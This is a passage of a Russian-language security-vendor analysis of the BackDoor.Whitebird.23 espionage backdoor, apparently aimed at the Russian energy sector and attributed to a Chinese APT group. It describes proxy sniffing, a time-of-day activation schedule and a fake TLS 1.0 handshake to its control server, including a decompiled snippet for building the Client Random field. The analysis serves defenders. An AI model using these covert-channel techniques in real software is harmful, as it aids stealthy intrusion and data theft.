Для обСспСчСния своСй постоянной Ρ€Π°Π±ΠΎΡ‚Ρ‹ бэкдор мСняСт Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅, ΡƒΠΊΠ°Π·Π°Π½Π½ΠΎΠ΅ Π² ΠΏΠΎΠ»Π΅ working_hours ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ. ПолС содСрТит 1440 Π±Π°ΠΉΡ‚ΠΎΠ², ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΠΏΡ€ΠΈΠ½ΠΈΠΌΠ°ΡŽΡ‚ значСния 0 ΠΈΠ»ΠΈ 1 ΠΈ ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²Π»ΡΡŽΡ‚ собой ΠΊΠ°ΠΆΠ΄ΡƒΡŽ ΠΌΠΈΠ½ΡƒΡ‚Ρƒ ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ часа Π² сутках. Π‘ΠΎΠ·Π΄Π°Π΅Ρ‚ для ΠΊΠ°ΠΆΠ΄ΠΎΠ³ΠΎ сСтСвого интСрфСйса ΠΎΡ‚Π΄Π΅Π»ΡŒΠ½Ρ‹ΠΉ ΠΏΠΎΡ‚ΠΎΠΊ, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹ΠΉ ΠΏΡ€ΠΎΡΠ»ΡƒΡˆΠΈΠ²Π°Π΅Ρ‚ интСрфСйс ΠΈ ΠΈΡ‰Π΅Ρ‚ ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ Π°Π²Ρ‚ΠΎΡ€ΠΈΠ·Π°Ρ†ΠΈΠΈ Π½Π° прокси-сСрвСрС с Π·Π°Ρ€Π°ΠΆΠ΅Π½Π½ΠΎΠ³ΠΎ ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Π°. ΠŸΡ€ΠΈ ΠΎΠ±Π½Π°Ρ€ΡƒΠΆΠ΅Π½ΠΈΠΈ Ρ‚Π°ΠΊΠΎΠ³ΠΎ ΠΏΠ°ΠΊΠ΅Ρ‚Π° бэкдор вносит ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΡŽ ΠΎ прокси-сСрвСрС Π² свой список. ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, провСряСт Π½Π°Π»ΠΈΡ‡ΠΈΠ΅ прокси Ρ‡Π΅Ρ€Π΅Π· WinAPI InternetQueryOptionW.

ΠŸΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌΠ° провСряСт Ρ‚Π΅ΠΊΡƒΡ‰ΠΈΠ΅ ΠΌΠΈΠ½ΡƒΡ‚Ρƒ ΠΈ час ΠΈ сравниваСт с Π΄Π°Π½Π½Ρ‹ΠΌΠΈ, находящимися Π² ΠΏΠΎΠ»Π΅ working_hours ΠΊΠΎΠ½Ρ„ΠΈΠ³ΡƒΡ€Π°Ρ†ΠΈΠΈ. Если Π·Π½Π°Ρ‡Π΅Π½ΠΈΠ΅ для ΡΠΎΠΎΡ‚Π²Π΅Ρ‚ΡΡ‚Π²ΡƒΡŽΡ‰Π΅ΠΉ ΠΌΠΈΠ½ΡƒΡ‚Ρ‹ суток Π½Π΅ Π½ΡƒΠ»Π΅Π²ΠΎΠ΅, Ρ‚ΠΎ устанавливаСт соСдинСниС с ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰ΠΈΠΌ сСрвСром.

Установка соСдинСния с сСрвСром ΠΈΠΌΠΈΡ‚ΠΈΡ€ΡƒΠ΅Ρ‚ созданиС соСдинСния ΠΏΠΎ ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Ρƒ TLS вСрсии 1.0 ΠΌΠ΅ΠΆΠ΄Ρƒ ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΎΠΌ ΠΈ сСрвСром. Π’ Ρ‚Π΅Π»Π΅ бэкдора содСрТатся Π΄Π²Π° Π±ΡƒΡ„Π΅Ρ€Π°.

ΠŸΠ΅Ρ€Π²Ρ‹ΠΉ Π±ΡƒΡ„Π΅Ρ€ содСрТит ΠΏΠ°ΠΊΠ΅Ρ‚ Client Hello вСрсии TLS 1.0.

РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

Π’Ρ‚ΠΎΡ€ΠΎΠΉ Π±ΡƒΡ„Π΅Ρ€ содСрТит TLS 1.0 ΠΏΠ°ΠΊΠ΅Ρ‚Ρ‹ Client Key Exchange с Π΄Π»ΠΈΠ½ΠΎΠΉ ΠΊΠ»ΡŽΡ‡Π° 0x100 Π±Π°ΠΉΡ‚, Change Cipher Spec, Encrypted Handshake Message.

РасслСдуСм Ρ†Π΅Π»Π΅Π²ΡƒΡŽ ΡˆΠΏΠΈΠΎΠ½ΡΠΊΡƒΡŽ Π°Ρ‚Π°ΠΊΡƒ Π½Π° российский ВЭК

ΠŸΡ€ΠΈ ΠΎΡ‚ΠΏΡ€Π°Π²ΠΊΠ΅ ΠΏΠ°ΠΊΠ΅Ρ‚Π° Client Hello бэкдор записываСт Π² ΠΏΠΎΠ»Π΅ Client Random 4 Π±Π°ΠΉΡ‚Π° Ρ‚Π΅ΠΊΡƒΡ‰Π΅Π³ΠΎ Π²Ρ€Π΅ΠΌΠ΅Π½ΠΈ ΠΈ 28 Π±Π°ΠΉΡ‚ псСвдослучайных Π΄Π°Π½Π½Ρ‹Ρ…, вычисляСмых ΡΠ»Π΅Π΄ΡƒΡŽΡ‰ΠΈΠΌ ΠΎΠ±Ρ€Π°Π·ΠΎΠΌ:


v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
  *(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
  clientrnd[j] ^= 7 * (_BYTE)j;

ΠŸΠΎΠ»ΡƒΡ‡Π΅Π½Π½Ρ‹ΠΉ ΠΏΠ°ΠΊΠ΅Ρ‚ отправляСтся Π½Π° ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰ΠΈΠΉ сСрвСр. Π’ ΠΎΡ‚Π²Π΅Ρ‚Π΅ (ΠΏΠ°ΠΊΠ΅Ρ‚ Server Hello) ΠΏΡ€ΠΎΠ²Π΅Ρ€ΡΡŽΡ‚ΡΡ:

  • соотвСтствиС ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π° TLS вСрсии 1.0;
  • соотвСтствиС Π²Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ ΠΌΠ΅Ρ‚ΠΊΠΈ (ΠΏΠ΅Ρ€Π²Ρ‹Π΅ 4 Π±Π°ΠΉΡ‚Π° поля ΠΏΠ°ΠΊΠ΅Ρ‚Π° Random Data), ΡƒΠΊΠ°Π·Π°Π½Π½ΠΎΠΉ ΠΊΠ»ΠΈΠ΅Π½Ρ‚ΠΎΠΌ, Π²Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ ΠΌΠ΅Ρ‚ΠΊΠ΅, ΡƒΠΊΠ°Π·Π°Π½Π½ΠΎΠΉ сСрвСром;
  • совпадСниС ΠΏΠ΅Ρ€Π²Ρ‹Ρ… 4 Π±Π°ΠΉΡ‚ΠΎΠ² послС Π²Ρ€Π΅ΠΌΠ΅Π½Π½ΠΎΠΉ ΠΌΠ΅Ρ‚ΠΊΠΈ Π² ΠΏΠΎΠ»Π΅ Random Data Ρƒ ΠΊΠ»ΠΈΠ΅Π½Ρ‚Π° ΠΈ сСрвСра.

Π’ случаС ΡƒΠΊΠ°Π·Π°Π½Π½Ρ‹Ρ… соотвСтствий бэкдор Π³ΠΎΡ‚ΠΎΠ²ΠΈΡ‚ ΠΏΠ°ΠΊΠ΅Ρ‚ Client Key Exchange. Для этого ΠΎΠ½ ΠΌΠΎΠ΄ΠΈΡ„ΠΈΡ†ΠΈΡ€ΡƒΠ΅Ρ‚ Public Key Π² ΠΏΠ°ΠΊΠ΅Ρ‚Π΅ Client Key Exchange, Π° Ρ‚Π°ΠΊΠΆΠ΅ Encryption IV ΠΈ Encryption Data Π² ΠΏΠ°ΠΊΠ΅Ρ‚Π΅ Encrypted Handshake Message.

Π—Π°Ρ‚Π΅ΠΌ бэкдор ΠΏΡ€ΠΈΠ½ΠΈΠΌΠ°Π΅Ρ‚ ΠΏΠ°ΠΊΠ΅Ρ‚ ΠΎΡ‚ ΡƒΠΏΡ€Π°Π²Π»ΡΡŽΡ‰Π΅Π³ΠΎ сСрвСра, провСряСт, Ρ‡Ρ‚ΠΎ вСрсия ΠΏΡ€ΠΎΡ‚ΠΎΠΊΠΎΠ»Π° TLS соотвСтствуСт 1.0, послС Ρ‡Π΅Π³ΠΎ ΠΏΡ€ΠΈΠ½ΠΈΠΌΠ°Π΅Ρ‚ Π΅Ρ‰Π΅ 54 Π±Π°ΠΉΡ‚Π° (Ρ‚Π΅Π»ΠΎ ΠΏΠ°ΠΊΠ΅Ρ‚Π°). На этом установка соСдинСния Π·Π°Π²Π΅Ρ€ΡˆΠ°Π΅Ρ‚ΡΡ.

Π‘ΠΎΠ»Π΅Π΅ ΠΏΠΎΠ»Π½ΠΎΠ΅ описаниС ΠΏΡ€ΠΈΠ½Ρ†ΠΈΠΏΠΎΠ² Ρ€Π°Π±ΠΎΡ‚Ρ‹ BackDoor.Whitebird.23 находится Π² нашСй вирусной Π±ΠΈΠ±Π»ΠΈΠΎΡ‚Π΅ΠΊΠ΅.

Π—Π°ΠΊΠ»ΡŽΡ‡Π΅Π½ΠΈΠ΅ ΠΈ Π²Ρ‹Π²ΠΎΠ΄Ρ‹

Анализ Π΄ΠΎΠΊΡƒΠΌΠ΅Π½Ρ‚ΠΎΠ², врСдоносных ΠΏΡ€ΠΎΠ³Ρ€Π°ΠΌΠΌ, Π° Ρ‚Π°ΠΊΠΆΠ΅ использованной инфраструктуры позволяСт Π½Π°ΠΌ с ΡƒΠ²Π΅Ρ€Π΅Π½Π½ΠΎΡΡ‚ΡŒΡŽ ΡΠΊΠ°Π·Π°Ρ‚ΡŒ, Ρ‡Ρ‚ΠΎ Π°Ρ‚Π°ΠΊΠ° Π±Ρ‹Π»Π° ΠΏΠΎΠ΄Π³ΠΎΡ‚ΠΎΠ²Π»Π΅Π½Π° ΠΎΠ΄Π½ΠΎΠΉ ΠΈΠ· китайских APT-Π³Ρ€ΡƒΠΏΠΏ. Учитывая Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠΎΠ½Π°Π»ΡŒΠ½ΠΎΡΡ‚ΡŒ бэкдоров, ΠΊΠΎΡ‚ΠΎΡ€Ρ‹Π΅ ΡƒΡΡ‚Π°Π½Π°Π²Π»ΠΈΠ²Π°ΡŽΡ‚ΡΡ Π½Π° ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€Ρ‹ ΠΆΠ΅Ρ€Ρ‚Π² Π² случаС ΡƒΡΠΏΠ΅ΡˆΠ½ΠΎΠΉ Π°Ρ‚Π°ΠΊΠΈ, Π·Π°Ρ€Π°ΠΆΠ΅Π½ΠΈΠ΅ Π²Π΅Π΄Π΅Ρ‚ ΠΊΠ°ΠΊ ΠΌΠΈΠ½ΠΈΠΌΡƒΠΌ ΠΊ ΠΊΡ€Π°ΠΆΠ΅ ΠΊΠΎΠ½Ρ„ΠΈΠ΄Π΅Π½Ρ†ΠΈΠ°Π»ΡŒΠ½ΠΎΠΉ ΠΈΠ½Ρ„ΠΎΡ€ΠΌΠ°Ρ†ΠΈΠΈ с ΠΊΠΎΠΌΠΏΡŒΡŽΡ‚Π΅Ρ€ΠΎΠ² Π°Ρ‚Π°ΠΊΠΎΠ²Π°Π½Π½Ρ‹Ρ… ΠΎΡ€Π³Π°Π½ΠΈΠ·Π°Ρ†ΠΈΠΉ.

ΠšΡ€ΠΎΠΌΠ΅ Ρ‚ΠΎΠ³ΠΎ, вСсьма вСроятным сцСнариСм являСтся установка спСциализированных троянов Π½Π° Π»ΠΎΠΊΠ°Π»ΡŒΠ½Ρ‹Π΅ сСрвСры с особой Ρ„ΡƒΠ½ΠΊΡ†ΠΈΠ΅ΠΉ. Π­Ρ‚ΠΎ ΠΌΠΎΠ³ΡƒΡ‚ Π±Ρ‹Ρ‚ΡŒ ΠΊΠΎΠ½Ρ‚Ρ€ΠΎΠ»Π»Π΅Ρ€Ρ‹ Π΄ΠΎΠΌΠ΅Π½Π°, ΠΏΠΎΡ‡Ρ‚ΠΎΠ²Ρ‹Π΅ сСрвСры, ΠΈΠ½Ρ‚Π΅Ρ€Π½Π΅Ρ‚-ΡˆΠ»ΡŽΠ·Ρ‹ ΠΈ Ρ‚. ΠΏ. Как ΠΌΡ‹ ΠΌΠΎΠ³Π»ΠΈ Π½Π°Π±Π»ΡŽΠ΄Π°Ρ‚ΡŒ Π½Π° ΠΏΡ€ΠΈΠΌΠ΅Ρ€Π΅ ΠΈΠ½Ρ†ΠΈΠ΄Π΅Π½Ρ‚Π° Π² ΠšΠ°Π·Π°Ρ…ΡΡ‚Π°Π½Π΅, Ρ‚Π°ΠΊΠΈΠ΅ сСрвСры ΠΏΠΎ Ρ€Π°Π·Π»ΠΈΡ‡Π½Ρ‹ΠΌ ΠΏΡ€ΠΈΡ‡ΠΈΠ½Π°ΠΌ ΠΏΡ€Π΅Π΄ΡΡ‚Π°Π²Π»ΡΡŽΡ‚ особый интСрСс для Π·Π»ΠΎΡƒΠΌΡ‹ΡˆΠ»Π΅Π½Π½ΠΈΠΊΠΎΠ².

Π˜ΡΡ‚ΠΎΡ‡Π½ΠΈΠΊ: habr.com

Π”ΠΎΠ±Π°Π²ΠΈΡ‚ΡŒ ΠΊΠΎΠΌΠΌΠ΅Π½Ρ‚Π°Ρ€ΠΈΠΉ